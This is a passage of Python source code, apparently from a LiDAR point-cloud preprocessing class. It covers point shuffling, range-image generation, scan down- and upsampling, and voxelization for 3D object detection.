data_dict['range_image_in'] = img
return data_dict
def shuffle_points(self, data_dict=None, config=None):
if data_dict is None:
return partial(self.shuffle_points, config=config)
points = data_dict['points']
shuffle_idx = np.random.permutation(points.shape[0])
points = points[shuffle_idx]
data_dict['points'] = points
return data_dict
def get_range_image(self, data_dict=None, config=None):
if data_dict is None:
return partial(self.get_range_image, config=config)
points = data_dict['points']
range_image, _, _ = scan_to_range(points, normalize=True)
range_image = range_image[:,:,:2]
data_dict['range_image_even'] = range_image[::2, :, :].transpose((2, 0, 1))
data_dict['range_image_odd'] = range_image[1::2, :, :].transpose((2, 0, 1))
if 'points' in data_dict:
data_dict.pop('points')
if 'gt_boxes' in data_dict:
data_dict.pop('gt_boxes')
return data_dict
def scan_downsample(self, data_dict=None, config=None):
if data_dict is None:
return partial(self.scan_downsample, config=config)
points = data_dict['points']
points_lr = scan_downsample(points)
data_dict['points'] = points_lr
return data_dict
def scan_upsample(self, data_dict=None, config=None):
if data_dict is None:
return partial(self.scan_upsample, config=config)
points = data_dict['points']
points_dense = scan_upsample(points)
data_dict['points'] = points_dense
return data_dict
def voxelization(self, data_dict=None, config=None, voxel_generator=None):
if data_dict is None:
from spconv.utils import VoxelGenerator
point_cloud_range = np.array(config['point_cloud_range'], dtype=np.float32)
voxel_generator = VoxelGenerator(
voxel_size=config['voxel_size'],
point_cloud_range=point_cloud_range,
max_num_points=config['max_points_per_voxel'],
max_voxels=config['max_num_voxels'], full_mean=False
)
grid_size = (point_cloud_range[3:6] - point_cloud_range[0:3]) / np.array(config['voxel_size'])
self.grid_size = np.round(grid_size).astype(np.int64)
self.voxel_size = config['voxel_size']
return partial(self.voxelization, voxel_generator=voxel_generator)
points = data_dict['points']
voxels, coordinates, num_points = voxel_generator.generate(points)
data_dict['use_lead_xyz'] = True
#if not data_dict['use_lead_xyz']:
# voxels = voxels[..., 3:] # remove xyz in voxels(N, 3)
data_dict['voxels'] = voxels
data_dict['voxel_coords'] = coordinates
data_dict['voxel_num_points'] = num_points
return data_dict
def forward(self, data_dict):
"""
Args:
data_dict:
points: (N, 3 + C_in)
gt_boxes: optional, (N, 7 + C) [x, y, z, dx, dy, dz, heading, ...]
gt_names: optional, (N), string
...
Returns:
"""
for cur_processor in self.data_processor_queue:
data_dict = cur_processor(data_dict=data_dict)
return data_dict
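# Hedged end-to-end sketch (illustrative only; the config values are placeholders):
#   processor = DataProcessor([
#       {'name': 'shuffle_points'},
#       {'name': 'voxelization', 'point_cloud_range': [0, -40, -3, 70.4, 40, 1],
#        'voxel_size': [0.05, 0.05, 0.1], 'max_points_per_voxel': 5, 'max_num_voxels': 16000},
#   ])
#   data = processor.forward({'points': points})  # points: (N, 3 + C) numpy array
#   # data now holds 'voxels', 'voxel_coords' and 'voxel_num_points'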
| 40.674797 | 106 | 0.630022 |